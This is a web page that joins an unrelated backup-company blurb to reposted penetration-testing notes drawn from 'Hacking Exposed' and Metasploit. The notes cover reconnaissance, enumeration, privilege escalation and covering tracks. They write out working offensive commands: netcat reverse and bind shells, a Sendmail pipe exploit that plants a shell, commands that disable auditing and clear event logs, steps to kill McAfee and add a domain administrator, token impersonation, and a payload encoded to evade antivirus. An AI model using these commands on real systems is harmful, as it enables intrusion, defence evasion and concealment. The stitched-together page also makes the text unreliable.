Secure cloud data backup and more

Founded by Morten Westerberg, who has dual US and Danish citizenship, in 2003, Nordic Backup was one of the first companies with a vision for cloud backup. For nearly two decades and thousands of companies and individuals protected, Nordic Backup has never a lost a single byte of customer data. We’ve restored thousands of computers and millions of files, getting businesses back up and running and lives back to normal.

More than anything else, we believe that says who we are.

https://nordic-backup.com/about/ 

Hacking Exposed Notes

Footprinting – profiling an organization Internet, Intranet, Remote Access, and Extranet presence to determine security posture and netblocks

Website Pilfering – grabbing source code to analyze offline

Unix – Wget http://www.gnu.org/software/wget/wget.html

Win – Teleport Pro http://www.tenmax.com/teleport/home.htm

Search Engines – tools for searching multiple engines, IRC, email, etc at once

Win – FerretPRO($) http://www.ferretsoft.com

Web – DogPile http://www.dogpile.com

Registered Networks – internet whois searches

Current Registrars http://www.internic.net/alpha.html

Unix – Whois, Xwhois http://c64.org/~nr/xwhois/

Unix - $ whois “acme.”@whois.crsnic.net (list possible domains)

Unix - $ whois “HANDLE JS1234”@whois.networksolutions.com (list POC info)

Unix - $ whois “@acme.net”@whois.networksolutions.net (list email info)

Web – US http://www.arin.net

Web – International http://www.allwhois.com

Web – US Military http://whois.nic.mil

Web – US Gov http://whois.nic.gov

DNS Interogation – zone transfers between primary and secondary

Unix - $ nslookup

$ server x.x.x.x

$ set type=any

$ ls –d Acme.net. >> /tmp/zone_out

Unix - $ host –l –v –t any Acme.net

Unix - $ host Acme.net (resolves Mail Exchange records)

Unix – axfr http://ftp.cdit.edu.cn/pub/linux/www.trinux.org/src/netmap/axfr-0.5.2.tar.gz

Win – Sam Spade http://www.samspade.org



Network Reconnaissance – determine path to network(access path diagram)

Unix - $ traceroute –S –p53 x.x.x.x ( p option allows you to specify port to start at and will increment by one; S option will stop incrementing once open port is found)

Requires patch http://www.packetfactory.net/Projects/firewalk/traceroute.diff

Unix – traceroute option –I uses ICMP packets, default is UDP

Win – tracert(CLI)

Win – VisualRoute http://www.visualroute.com , NeoTrace http://www.neotrace.com (GUI)

Counter Measure – log incoming traceroutes and send back false data

RotoRouter http://packetstorm.securify.com/UNIX/loggers/rr-1.0.tgz


Scanning – determine systems that are alive and reachable via sweeps, port scans, and discovery tools

Ping Sweeps – sending out ICMP ECHO(type 8) across ranges

Unix – fping http://packetstorm.securify.com/Exploit_Code_Archive/fping.tar.gz

Unix – nmap, use –sP option and valid net range, -PT<#> allows you to try other ports if blocked

Unix – Hping http://www.kyuzz.org/antirez/ allows you to send fragmented packets(-f)

Unix – icmpenum http://www.nmrc.org/files/sunix/icmpenum-1.1.1.tgz ability to use ICMP TIME STAMP REQUESTS and ICMP INFO when ECHO is blocked, spoof packets with –s option, and passively list with the –p option

Win – Pinger http://www.nmrc.org/files/snt/

Win – Ping Sweep http://www.solarwinds.net


Additional Tools

Unix – Loki2 http://www.phrack.org/show.php?p=51&a=6 wraps data in ICMP packets, used to bypass firewalls and install backdoors



Port Scanning – connecting to TCP and UDP ports on a target system to see which services are running and which OS

TCP connect scan – full three way handshake, easily detected by host or NIDS

TCP SYN scan – no ACK is sent, only RST /ACK so that no connection is made, stealthier

TCP Xmas Tree Scan – uses FIN, URG, PUSH packets to receive RST for closed ports

TCP Null Scan – sends packet with no flags to receive RST for closed ports

TCP ACK Scan – used to map firewall rulesets, determine statefullness

TCP Windows Scan – analyzes TCP window size for OS identification and open ports

TCP RCP Scan – Unix, detect RPC ports and associated program

UDP Scan – looks for ICMP port unreachable, less accurate, slower

Unix – Strobe ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/distfiles/strobe-1.06.tgz TCP scanner, also grabs banners

Unix – Saint(SATAN) http://www.saintcorporation.com/products/download.html UDP scanner

Unix - netcat http://www.saintcorporation.com/products/download.html Multifunction scanner

Unix – nmap, -D option for decoy scan, -I option shows owner of service(root), -b ftp bounce

Win – SuperScan http://www.foundstone.com/resources/proddesc/superscan4.htm

FTP Bounce Scanning - allows attacker put/get data via 3rd party server that is trusted by the target host. Requires port command and writable directory on system

http://www.securityfocus.com/archive/1/3488


Scan Detection

Unix – Snort http://www.snort.org/docs/ open source NIDS

Unix – scanlogd http://www.openwall.com/scanlogd/ host based logging

Unix – PortSentry http://sourceforge.net/projects/sentrytools/ host based, detects and blocks

Unix – alert.sh http://www.spitzner.net/intrusion.html firewall scan detection

Win – Genius 3.2.3 http://www.indiesoft.com/ windows host based scan detection

OS Determination – using techniques such as banner grabbing, port scanning, and stack fingerprinting to determine target hosts Operating System

Stack Fingerprinting – analyzing target machine’s TCP/IP stack for OS specific signatures. Each Vendor implements the TCP/IP stack slightly different.

http://www.insecure.org/nmap/nmap-fingerprinting-article.html

Passive Stack Fingerprinting – no connections are made, only analyzing packets via a sniffer for specific attributes such as TTL, Window Size, and DF(don’t fragment bit). The results can be compared to the Siphon fingerprint db http://www.l0t3k.org/security/tools/fingerprinting/

Discovery Tools

Unix – Cheops http://www.marko.net/cheops/ Linux GUI for network discovery via ping, traceroute, queso

Unix – Scotty http://wwwhome.cs.utwente.nl/~schoenw/scotty/ discovery tool, includes SNMP



Enumeration – process of extracting valid account and shared resource information for a target host

WINDOWS

Windows Resouce Kits – contains useful Windows utilities

Win2K - http://www.microsoft.com/windows2000/techinfo/reskit/tools/default.asp

- http://www.dynawell.com/support/ResKit/win2k.asp

WinNT - http://www.dynawell.com/support/ResKit/winnt.asp

Null Sessions – CIFS/SMB & NetBIOS all unauthenticated sessions via port 139 & 445

Win – C:>\net use \\192.168.202.33\IPC$ “” /u:”” (setting up a null session)

Win – edit registry key HKLM\SYSTEM\CurrentControlSet\Control\LSA\Restrict Anonymous

Must be set to 1 for NT and 2 for W2K to restrict null sessions. Read Hobbits CIFS paper for further info http://www.insecure.org/stf/cifs.txt

Domain Enumeration – use netbios on UDP port 137 to list domains and domain machines

Win – C:\>net view /domain

C:\>net view /domain: (lists machines on domain)

NetBIOS Name Tables – grab NetBIOS names remotely

Win – C:\>nbtstat –A 192.168.202.33

Win – C:\>nbtscan 192.168.234.0/24

Unix/Win versions found at http://www.inetcat.org/software/

Domain Controller Enumeration

Win – C:\>nltest /dclist: (ran over null session nltest /server:)

C:\>nltest /trusted_domains


Share Enumeration

Win – C:\>net view \\ (rmtshare, srvinfo [-s] also good NTRK)

Win – DumpSec also shows file system permissions and services http://www.somarsoft.com/

Win – Legion 2.1 http://www.elhacker.net/hacking.htm

Win – NAT ftp://ftp.technotronic.com/microsoft/nat10bin.zip


Misc Windows Enumeration Tools

Win – Epdump RPC service/port mappings http://packetstormsecurity.org/NT/audit/epdump.zip

Win – netviewx lists specific server types like domain controller, RAS, print

C:\>netviewx –D -T

http://www.ibt.ku.dk/jesper/NetViewX/default.htm

Win – Winfo automates null sessions http://www.ntsecurity.nu/toolbox/winfo/

Win – Nbtdump provides HTML report http://www.cerberus-infosec.co.uk/toolsn.shtml


SNMP Enumeration

Win – Snmputil – browses MIB(Management Information Base) tree using default strings like public, private. The tree is hierarchical, so each time you “walk up” more information is revealed. “.1.3.6.1.4.1.77.1.2.25” is the OID for Microsoft’s MIB.(NTRK)

C:\>snmputil walk 192.168.202.33 public .1.3.6.1.4.1.77.1.2.25

Win – IP Browser – Solarwinds GUI, http://www.solarwinds.net


More CIFS/SMB Enumeration

Win – Dumpsec(DumpACL) – uses null session to get user, group, share, and policy info

Win – sid2user/user2sid – allows for easy conversion of SID’s to usernames and vice versa

http://www.chem.mus.su:8080/~rudnyi/NT/sid.txt

C:\>user2sid \\ “domain users” (grabs the machines SID)

C:\>sid2user \\ 5 21 8915387 1645822062 18198280005 500 (grabs admin account’s user name, note 500 is always the admin RID, even if its renamed. Also, the first account created is always given an RID of 1000 and incremented by one from there)

Mark Russinovich http://www.win2000mag.com/Articles/Index.cfm?ArticleID=3143

Win – Enum – CLI utility for enumeration & password guessing http://razor.bindview.com

C:\>enum –U –d –P –L –c

Win – Nete from sirdystic of CDC, similar to enum

Win – UserInfo/UserDump user Level 3 call on NetUserGetInfo API http://www.HammerofGod.com/download.htm


LDAP Enumeration

Win – ldp.exe – Active Directory Administration Tool – connects to AD server and allows you to browse contents, runs on either port 389 or 3268(AD Global Catolog)

Banner Enumeration

Banner grabbing via telnet or netcat on various ports like 80, 21, 23, 25 will often leak system, OS, application, user, or version information. Also common to “nudge” the system into coughing up more information using commands like: GET / HTTP/1.0, HEAD, QUIT, HELP, ECHO, and sometimes just carriage returns.

Registry Enumeration

Regdmp(NTRK) or DumpSec(Somarsoft) can be both be used to do this, however by default Win2K Server usually doesn’t allow this. Review the Key HKLM\System\CurrentControlSet\Control\SecurePipeServer\Winreg\AllowedPaths

To see whats allowed

UNIX

NFS Enumeration

Unix – showmount – lists all NFS(port 2049) exported file systems on a machine

$showmount –e

NIS Enumeraton

Unix – in general various NIS client tools can be used to guess the NIS domain name of a server and retrieve NIS maps, which contain valuable information(pscan by Pluvius)

User & Group Enumeration

Unix – finger(port 79), rwho, rusers all list out who is on the machine at the time. To disable these services simply edit the inetd.conf file and killall –HUP inetd

Unix – SMTP – VRFY will confirm name of valid user; EXPN will give out the actual mail address of aliases and mailing lists. Just telnet to port 25 to test.

Unix – tftp – if enabled, may allow you to get the /etc/password file.

RPC Enumeration

Unix – rpcinfo, rpcdump – both list the RPC bindings for all applications running on the box. RPC uses ports 111, 32771. http://www.atstake.com/research/tools/info_gathering/

SNMP Enumeration

Unix – the net-snmp package will usually include both snmpget and snmpwalk

$ snmpget public system.sysName.0 (grabs host name)

$ snmpwalk public (grabs eniter MIB)


BGP Route Enumeration

Unix – ASN Queries – ASN(Autonomous System Numer) is a 16-bit integer purchased from ARIN to identify a company on the internet. Use http://www.completewhois.com/ to search for this info.

C:\> telnet route-views.Oregon-ix.net (public router)

Ø show ip bgp (last number in AS Path is ASN)

Ø show ip bgp regexp _$ (will give you the public IP space of company)


Windows NT Hacking – gaining access, escalating privileges and covering tracks on Windows NT system

Password Guessing

Default Passwords http://packetstormsecurity.org/docs/hack/dad.txt

http://phenoelit.darklab.org/cgi-bin/display.pl?SUBF=list&SORT=1

http://www.cirt.net/cgi-bin/passwd.pl


Null Passwords Tools NTInfoScan http://packetstormsecurity.org/NT/audit/index2.html

SMBGrind http://www2.packetstormsecurity.org/cgi-bin/search/search.cgi?searchvalue=SMBGrind&type=archives

Password Sniffing SMB Packet Capture(readsmb) included with l0phtcrack

PPTP – Unix based sniffer that captures VPN credentials(packetstorm)

Cain & Abel filters out login credentials http://www.oxid.it/


Pass The Hash NT Only, LSASS allows hash only authentication

http://www.core-sdi.com/papers/nt-cred.htm

Buffer Overflows unexpected input, which forces arbitrary code into the execution stack

http://www.cultdeadcow.com/cDc_files/cDc-351/page1.html by DilDog

http://pulhas.org/phrack/55/P55-15.html by Barnaby Jack

http://www.insecure.org/stf/smashstack.txt by Aleph One


Privilege Escalation

Hoovering process of stealing as much info off the machine as possible with a non-admin account. Srvinfo(NTRK) will enumerate shares and regdmp(NTRK) can probe the registry for info. Also good to script a find command in a batch file to look for the password string. GetAdmin uses DLL injection to add a user into the local admin group(crash4)
http://www.windowsitsecurity.com/Articles/Index.cfm?ArticleID=9231


Sechole, Secholed escalates privileges of IUSR_machine_name account on IIS, must be able to upload to a executable directory on server http://www.winnetmag.com/Article/ArticleID/9269/9269.html

LPC Spoofing

hk(porttool) from Razor exploits the LPC Ports API, which has weak validation checks. Allows user to make a client thread as the SYSTEM user. http://www.bindview.com/Support/RAZOR/Utilities/Windows/LPCAdvisory.cfm

Password Cracking the SAM file may be obtained by booting to an alternate OS, from the repair directory, or extracting from the registry via tool.

Pwdump extracts password hashes from the SAM http://packetstormsecurity.org/Crackers/NT/pwdump3.zip

L0phtcrack defacto standard for cracking windows passwords, not free anymore LC5 http://www.atstake.com/products/lc/index.html

Cain & Abel - Poor man’s version of LC, free http://www.oxid.it/cain.html

Wordlists - http://coast.cs.purdue.edu/pub/dict/ http://www.cotse.com/tools/wordlists.htm

Exploiting Trusts

LSA Secrets - The key HKLM\SECURITY\Policy\Secrets holds service accounts in plain text, cached passwords of last 10 users, FTP and web plain test passwords, RAS usernames and passwords, and domain account information. Lsadump2 finds PID of LSASS and uses dll injection http://www.bindview.com/Support/RAZOR/Utilities/Windows/lsadump2_readme.cfm

Sniffers

WinDump, “w32 tcpdump” http://windump.polito.it/install/default.htm Ethereal http://www.ethereal.com/download.html
Dsniff for Win32 http://www.datanerds.net/~mike/dsniff.html

Keystroke Loggers - If sniffing fails, install a keystroke logger to obtain domain credentials http://www.download.com/3120-20-0.html?qt=Keystroke+logger&tg=dl-2001

Remote Control & Backdoors - Remote.exe From NTRK, gives remote users a CMD shell. Most popular way to start it on the host is the us the AT command(scheduler service).

SC.exe - Service Controler will start the scheduler service if its not running C:\> sc \\ start schedule
C:\> net time \\ (to check time on remote system)
C:\> at \\ 10:40P “”remote /s cmd secret”” (launchesserver) C:\> remote /c secret (launches your client)

Netcat -TCP-IP Swiss-Army Knife http://packetstormsecurity.org/UNIX/utilities/nc110.tgz
C:\> nc –L –d –e cmd.exe –p80 (starts listener on target host)
C:\> nc 80 (connects attacker to target host)

Netbus - similar to Back Orifice, the nbsvr.exe must be started on target first. Good idea to run in stealth mode by modifying the registry, however most Virus scans will detect it running. Default ports are 12345 and 20034
C:\> regini –m \\ regchange.txt (NTRK) http://packetstormsecurity.org/trojans/NB20Pro.exe

BO2K - Back Orifice, still under active development, works on 2K and XP http://www.bo2k.com/software/index.html

Along with these VNC, Netmeeting, and dameware are poplular gui-based remote control apps

Port Redirection
Netcat - “Shell Shoveling” target listens on one port while sending the output back via cmd shell to the attacker. The attacker must listen on 2 ports
$ nc 80 | cmd.exe | nc 25 (run on target)

Fpipe - Popular port redirector, also allows for specifying source port. Does have some session timeout issues though with TIME_WAIT and CLOSE_WAIT periods C:\>fpipe –v –l 53 –r 23 (command to run on target) http://www.foundstone.com/resources/proddesc/fpipe.htm

Root Kits - first Windows rootkit was from Greg Hoglund of rootkit.com. A root kit is a software suite that substitutes command system binaries with Trojans. Rootkits use a technique known as “function hooking” to redirect calls without altering the executable or binary. The current generation of Kernel level rootkits are very difficult to detect as they are embedded in the OS. http://www.antiserver.it/Backdoor-Rootkit/

Cover Tracks
Disable Auditing
C:\> auditpol /disable (NTRK)
Clear Event Log
C:\> elsave –s \\ -l “Security” -C http://www.ibt.ku.dk/jesper/NTtools/

Hiding Files
C:\> attib +h [directory] (dos command)
NTFS File Streaming will hide stuff as additional file attributes. It requires the POSIX utility cp(NTRK)
C:\> cp : (just reverse to unhide)

Windows 2000 Hacking – gaining access, escalating privileges and covering tracks on Windows 2K system

Footprinting
Resource Kit Tools http://www.microsoft.com/windows2000/techinfo/reskit/tools/default.asp
http://www.dynawell.com/support/ResKit/win2k.asp

IPSec Filters - built in feature which does packet filtering very early in the network stack and will drop any packets which fail to meet the rules. Only flaw is that it cannot block IKE, multicast, or broadcast traffic and can’t do port ranges. http://www.microsoft.com/technet/itsolutions/network/security/ipsecld.mspx

Enumeration
NetBIOS/SMB - System information will still be leaked unless you do 1 of 2 things. Disabling File and Print Sharing on your outbound interface will prevent nullsessions. Set RestrictAnonymous = 2 in either the registry or in the Security Policy Manager.

Eavesdropping - All authentication sent using legacy LM hashes can be easily decrypted via L0phtcrack. Also, Kerberos authentication is not used if the user specifies an IP address instead of a hostname.

SMBRelay - When trying to connect to a share/server, Windows will automatically try to log in as the current user if no other authentication information is explicitly supplied, before asking the user for a logon/password. SMBRelay will conduct a MITM attack by fooling a user into connecting to your rogue server, meanwhile after capturing the traffic it is relayed to the actual destination and back to the end user. http://www.xfocus.net/articles/200305/smbrelay.html

Denial of Service
New Registry Keys
HKLM\Sys\CCS\Services\Tcpip\Parameters\SynAttackProtect = 2 (times out syn_received faster)
EnableDeadGWDetect = 0 (prevents attacker from changing default gw) EnablePMTUDiscovery = 0 (stops hackers from lowering MTU value)
KeepAliveTime = 300,000 (verify’s an idle connection is still intact)
Interfaces\NoNameReleaseOnDemand = 0 (stops malware)
Interfaces\PerformRouterDiscovery = 0 (stop router spoofing attack)
http://support.microsoft.com/default.aspx?scid=kb;en-us;142641

Nbname - This tools puts a host in Netbios Name Conflict effectively stopping all Netbios networking on the host. Must first disable NBT on attacker machine to use tool.
C:\>nbname /astat /confilict http://www.securityfocus.com/tools/1670

Privilege Escalation
PipeUpAdmin - Pre SP2, puts current user into admin group when run from cmd prompt http://content.443.ch/pub/security/blackhat/WinNT%20and%202K/pipeup/W2KPipeUp/

NetDDE - Network Dynamic Data Exchange service allows applications to share date through “trusted shares”. Runs as SYSTEM, so arbitrary code can be attached to the request and viola your admin. Requires Visual C++.
C:\>netddemsg –s cmd.exe http://www.atstake.com/research/advisories/2001/netddemsg.cpp

Pilfering
Defeating SYSKEY - pwdump3 can extract hashes from the SAM. Also pwdump3e from ebiz can do this remotely via SMB. http://www.securityfocus.com/tools/1964/chntpw Can be used on bootable media to insert hashes into the SAM. It disables SYSKEY prior to doing this. Similar to NTFSDOS Pro. http://home.eunet.no/~pnordahl/ntpasswd/syskey.txt

Deleting SAM simply booting to an alternate OS and deleting the SAM nullifies the administrator password. DC are not vulnerable. http://www.securiteam.com/windowsntfocus/5FP0B0U1FW.html

EFS - Encrypting File System allows users to encrypt files and folders at the OS level. Cipher can be used from the CMD line. Default Recovery Key is the local admin account, however it should be stored remotely. http://www.microsoft.com/windows2000/techinfo/howitworks/security/encrypt.asp

EFS Temporary - EFS writes a temp file in plain text before encrypting a new file, however a low level disk editor like diskprobe.exe(RK) can recover the file even after its deleted because the disk blocks are not overwritten.

Exploiting Trust
LSA Secrets - lsadump2 still functions on W2K. Microsoft doesn’t consider it a problem
Multimaster Model - Within a Windows 2K forest, all domains replicate a shared Active Directory and trust each other with 2-way transitive trusts necessitated by the Kerberos implementation. Trusts between forests and NT domains are still one-way. This allows for consolidation of domains and delegation of permissions via OU’s (organizational units).

Back Doors
Trap-Dooring Path - When executables and DLL files are not preceded by a path in the registry, windows searches for them in a default order. Therefore by placing your trojaned file on the system drive, the system will launch it instead of the original file. http://www.winnetmag.com/WindowsSecurity/Article/ArticleID/9637/WindowsSecurity_9637.html

Remote Control
Terminal Services running on 3389, TS allows brute force password guessing even if a lockout policy is set. TS also allows existing connections to be hijacked if the previous user forgot to logout correctly, assuming you have their credentials.

New Stuff
Group Policy - GPO is a new 2K feature, that allows you to configure security parameters in one place to be enforced locally or on the domain. (Gpedit.msc)

Secedit - Security Configuration and Analysis tool allows admins to audit the local system security for compliance issues. It also allows you to automatically make updates and have them applied immediately.

XP Stuff
ICF - Internet Connection Firewall offers packet filtering on all inbound traffic, while permitting all outbound traffic.
Software Restriction Policy allows central control over application security to protect against various forms of malware.
Built-In Support for encrypted Wireless Networking(802.11).
MS Passport single-login solution for internet, works by using a tamper-resistant cookie for accessing all sites that support MS passport authentication.
Credential Management, WPA, Remote Desktop, UPNP

UNIX/Linux Hacking – gaining access, escalating privileges and covering tracks on *NIX system

Vulnerability Mapping is the process of mapping specific security attributes of a system to an associated vulnerability or potential vulnerability.

Nessus is a defacto standard because its free and works. http://www.nessus.org/download.html (unix & windows ports)

Remote Attacks - Exploit a Listening Service (telnet, ftp, ssh, etc)
Route Through a Unix System – circumvent a Unix firewall by source routing your packets through the firewall. Works only if system has IP forwarding enabling.
User-Initiated Remote Execution – attacks requiring user interaction, such as browsing malicious web sites or opening email attachments.
Promiscuous Mode Attacks – crafted packets can exploit your sniffer application

Brute Force - Brutus Common tool http://www.hoobie.net/brutus/brutus-download.html
John - Standard Unix Cracker http://www.openwall.com/john/

Data Driven Attacks are executed by sending data to an active service that causes unintended or undesirable results.Buffer Overflow condition occurs when a user or process attempts to place more data into a buffer than was originally allocated. This type of behavior is associated with specific C functions like strcpy, strcat, sprintf etc. A buffer overflow condition would normally cause a segmentation violation to occur. When the attack is executed, special assembly code known as the egg is sent to the VRFY command as part of the actual string used to overflow the buffer. When it’s overrun, attackers can set the return address of the offending function, to point to their arbitrary code’s memory address, which usually includes a shell command. http://www.piaffe.org/panic/

Unix Memory Dump Analysis, Good Luck http://www.phrack.org/
Aleph One’s Paper Phrack 49 http://www.securityfocus.com/tools/1500
Hell Kit for writing buffer overflows
Disable stack execution in /etc/system:Set noexec_user_stack=1Set noexec_user_stack_log =1

Heap Overflows are based on overrunning memory that has been dynamically allocated by an application. This process differs from stack-based overflows, which depend on overflowing a fixed-length buffer. http://www.w00w00.org/files/heaptut/heaptut.txt

Format String Vulnerability arises in subtle programming errors in the formatted output family of functions, which includes printf() and sprintf(). An attacker can take advantage of this by passing carefully crafted test strings containing formatting directives, which can cause the target computer to execute arbitrary commands. For example by using printf(buf) instead of printf(“%I”, buf) the system will read the first argument supplied by the user as the format string and allow arbitrary code to follow it.

Input Validation Attacks occur when a program fails to recognize syntactically incorrect input, a module accepts extraneous input, a module fails to handle missing input fields, or a field-value correlation error occurs. Often used to exploit CGI scripts or other web applications. Shell AccessX Term if enabled is the easiest way to get local gui access on a machine remotely, but may need to be combined with an exploit though. $ /usr/X11R6/bin/xterm –ut :0.0

Reverse Telnet/Netcat will both provide attackers with a back channel into the system that originates from the target host. Both require a listener to be running.
$ /bin/telnet 80 | /bin/sh | /bin/telnet 25
$ nc –e /bin/sh 80

TFTP/Anonymous FTP both will allow attacker to gain access to your machine and if a writeable/executable directory is available the system is toast. The services themselves may be vulnerable to exploits.Sendmail the standard Unix Mail Transfer Agent has been full of vulnerabilities dating back to 1988. Common attacks aside from buffer overflows, input validation, and SMTP enumeration include:Pipe Vulnerability which allows a user to escape to a shell after the data portion
Helo
Mail from:
Rcpt to: bounceData.
mail from:
binrcpt to: |sed ‘1,/^$/d’ | shdata Forward VulnerabilityCat > .forward (create forward file to ftp to users home directory)|”cp /bin/sh /home/gk/evil_shell ; chmod 755 /home/gk/evil_shell” (creates shell executable)
$ echo hello chump | mail gk@targetsystem.comThis e-mail address is being protected from spam bots, you need JavaScript enabled to view it Refer to http://www.sendmail.org/ for up to date information

RPC is a mechanism that allows a program running on one computer to seamlessly execute code on a remote system. Most buffer overflow attacks target RPC services that run as root in order to gain shell access to the target sytem. Common services exploited include rpc.ttdbserverdb(tooltalk), rpc.cmsd(CDE), rpc.statd(automount), mountd, sadmind, and snmpXdmid.

NFS allows transparent access to files and directories of remote systems as if they were stored locally. Most of the security provided by NFS relates to a data object known as a file handle. The file handle is a token that is used to uniquely identify each file and directory on the remote server. If a file handle can be sniffed of guessed, remote attackers could easily access those files on the remote system.
$ showmount –e (lists exported file systems & permissions)
$ mount :/ /mnt

Try NFSshell for more functionality ftp://ftp.cs.vu.nl/pub/leendert

X Windows System allows exporting of the local graphical display to remote users.Xscan will scan an entire subnet looking for systems with xhosts + enabled and log any console keystrokes to a local logfile. http://www.seguridad0.net/programas/X-Scan-v3.0.zip
$ xlswins –display :0.0 (will list out hex id’s for you)
$ xwatchwin -w (allows you to observe somebody else’s x session)

DNS Insecurity refer to http://www.isc.org/index.pl?/sw/bind/bind-security.php

SSH Insecurity refer to http://www2.packetstormsecurity.org/cgi-bin/search/search.cgi?searchvalue=SSH+exploits&type=archives

Promisious Mode Attacks are common in Ethereal, tcpdump, and several other sniffersSymbolic Link can be exploited using any program, especially SUID ones, that creates a temp file and doesn’t perform any sanity checking. By linking that tmp file to the /etc/password or shadow file, the program will update it with its permissions and not root’s.
$ strings * | grep tmp (when run in /bin or /usr/bin, will list out good programs to target)

File Descriptors are nonnegative integers that the system uses to keep track of files rather than using specific filenames (0,1,2, std in, out, error). If a file descriptor is opened r/w by a privileged process, it may be possible for the attacker to write to the file while it is being modified. To shell out of vi, execute :!sh and then modify the tmp file or run exploit code.

Reference:
https://cyberguardians.blogspot.com/2006/03/hacking-exposed-notes.html 

Pen Testing Notes

Cisco Hacking Exposed

Google
!Host=*.* intext:enc_UserPassword=* ext:pcf
enable password | secret “current configuration” -intext:the
inurl:”level/15/exec/-/show”
“intitle:Cisco Systems, Inc. VPN 3000 Concentrator”
intitle:Cisco “You are using an old browser or have disabled javascript. You must use version 4 or higher of Netscape Navigator/Communicator”
intitle:”Cisco CallManager User Options Log On” intitle:”Cisco CallManager User Options Log On” “Please enter your User ID and Password"
inurl:webvpn.html “login” “Please enter your”
"ip host tftp"
intext:"Written by enable_15"

Windows Command Line Kung Fu
Enumerate the network
c:\set Use SET to get domain information and username
c:\net view Use NET VIEW to get computers in the users domain and other domains
c:\net view /domain Use NET VIEW to get computers in other domains
c:\net user Use NET USER to get local users on the computer you are on
c:\net user /domain All users in the current user's domain
c:\net localgroup Use NET LOCALGROUP to get the local groups on the computer
c:\net localgroup /domain Use NET LOCALGROUP to get the domain groups
c:\net localgroup administrators All users in the local administrators group
c:\net localgroup administrators /domain All users in the domain administrators group
c:\net group "Company Admins" /domain All users in the "Company Admins" group
c:\net user "wesley.pipes" /domain All info about this user
c:\nltest /dclist: List Domain Controllers...

Find a user
NBTSTAT -a remotecomputer | FIND "<03>" | FIND /I /V "remotecomputer"
WMIC /Node:remotecomputer ComputerSystem Get UserName
PSLOGGEDON -L \\remotecomputer
PSEXEC \\remotecomputer NET CONFIG WORKSTATION | FIND /I " name "
PSEXEC \\remotecomputer NET NAME
PSEXEC \\remotecomputer NETSH DIAG SHOW COMPUTER /V | FIND /i "username"

Kill McAfee
Get SYSTEM level cmd prompt
time
at /interactive cmd.exe
net stop "McAfee Framework Service"
net stop hips
net stop enterceptagent
net stop firepm
pskill -t UdaterUI
pskill -t TBMon
pskill -t Mcshield
pskill -t VsTskMgr
pskill -t shstat
pskill -t firetray

Add domain user
c:\net user j0e j0eR0ck$ /domain /add
c:\net localgroup administrators j0e /domain /add

Metasploit Kung Fu - Notes

XMLRPC Interface - allows metasploit to be accessed via XML over RPC, listens on TCP 55553 by default
msf> load xmlrpc

Payloads - Singles (windows/shell_bind_tcp) vs. Stages (windows/shell/bind_tcp)
Singles don't require back and forth communication, whereas stages allow for more flexibility in payloads

All stages attempt to dodge NX and DEP by default, except nonx
All stages use reflective DLL injection(copied into memory) currently, whereas the older patchupmeterpreter method left metsrv.dll visible to the system

msf> show options - gives you some great logging options as well as other useful features (ConsoleLogging, LogLevel, MinimumRank, SessionLogging,

TimestampOutput)

Exploits - some modules include check to verify vulnerability first and evasion to dodge IDS

set RHOSTS file:/tmp/targets.txt - when you don't have contiguous ip addresses or a single domain

Metasploit has IPv6 support in all exploits and auxiliary modules and some payloads

Save command will keep your session settings in ~/.msf3/config

Exploit -z will put any new sessions in the background, good for multiple targets
Exploit -j will background the exploit itself and give you the msf> prompt back right away
The commands can be used together

Pivot using msf> route add

Netcat using msf> connect

Resource files allow you to script metasploit commands msf> resource attack.rc

msf> irb gives you an interactive ruby shell usefull for writing exploits in real time that use ruby libraries

Pivot FTW meterpreter> portfwd add -l 1111 -p 2222 -r

To elevate to admin or system priveleges meterpreter> use priv

Incognito meterpreter> use incognito, list_tokens -u, impersonate_token DOMAIN\\user
meterpreter> use incognito
meterpreter> list_tokens -u
meterpreter> impersonate_token "domain\\user"
meterpreter> execute -c -H -f cmd -a "/k" -i -t <--- Use the -t to use your impersonated token or meterpreter > list_tokens -g
meterpreter > impersonate_token "DOMAIN\\Domain Admins"
meterpreter> execute -c -H -f cmd -a "/k" -i -t <--- Use the -t to use your impersonated token Meterpreter scripts: meterpreter> run getcountermeasure.rb, winenum.rb, checkvm.rb, prefetchtool.rb, scheduleme.rb, persistence.rb, hashdump.rb, getgui.rb,

winbf.rb, search_dwld.rb

msf> set AutoRunScript , allows you to quickly migrate to another process after exploitation

Run hidden processes meterpreter> execute -H -f calc.exe

Harvest emails msf> use auxiliary/gather/search_email_collector

DNS recon msf> use auxiliary/gather/dns_enum; ENUM_RVL option will do reverse lookup on a netrange

TCP Portscan msf> use auxiliary/scanner/portscan/
UDP Portscan msf> use auxiliary/scanner/discovery/sweep_udp - only common ports

Database Integration with MySQL and PostgeSQL - hosts, services, vulns, clients, and notes tables
Supports importing(db_import_) of nmap, amap, nessus, qualys, and nexpose data
Manually edit the datbase using db_add_ and db_del_

db_autopwn - generally unreliable and bad for production pentesting. Use -t option to list exploits for a found vulnerability. Planned -s option will only

return one shell and stop. Planned to run exploits by rating.

Other scanners include ftp, snmp, telnet, smb, robots.txt, oracle, mssql, mysql

New report generator is planned for Metasploit

XMLRPC allows Metasploit to be controlled by third party products like Nsploit(nmap) and BEeF. Both are still somewhat buggy.
msf> load xmlrpc Pass=; default user name is msf; optional ServerType=Web

Nsploit #nmap -A --script=ms03_026_dcom will auto execute the exploit if the port is open and there is an OS match

Public web document metadata is a good passive technique for finding out what software a company may be using

Browser_autopwn uses rex/exploitation/javascripttodetect module to find browser and OS version. Use MATCH option to narrow down the types of

exploits used. Likely to crash client browser, so quick migration is key. Very buggy behind NAT/Proxy. SSL option uses a default cert, however you can

provide a signed trusted one.

If attacking a large number of systems, its good to use separate LHOST c2 server running exploit/multi/handler

If a target is in another country or running a different language pack, its common for exploitation to fail because the return address may be different.

Msfpescan can check a binary for a new address by comparing it to the old one.
To find the existing offset # ./msfpescan -r
To find the new return address # ./msfpescan -b

msfpayload can output a variety of formats besides EXE including VBA, C, WAR, Ruby, Perl, JS. C code is useful for putting into a repository. VBA is

useful for embedding in Office docs as a macro. Outputting the payload into Ruby makes them usable by metasploit.

# ./msfpayload windows/shell/reverse_tcp LHOST= , LPORT=4444 R | ./msfencode -c 5 -e x86/shikata_ga_nai -t exe > notevil.exe

x86/shikata_ga_nai is the default and best encoder availabe in msfencode. It uses polymorphic shellcode in both the payload and the stub used to

decode your data. This is usuallly very good for dodging AV, however some vendors have added detection for the EXE template used by Metasploit.

The -x option allows you to specify any exe to be used as the PE template.

To test your encoded binaries and not have the submitted to AV use - http://scanner2.novirusthanks.org/

exe2vba.rb will convert your existing exe into vba format for use in Office Macros
py2exe will convert your python exploit into an exe

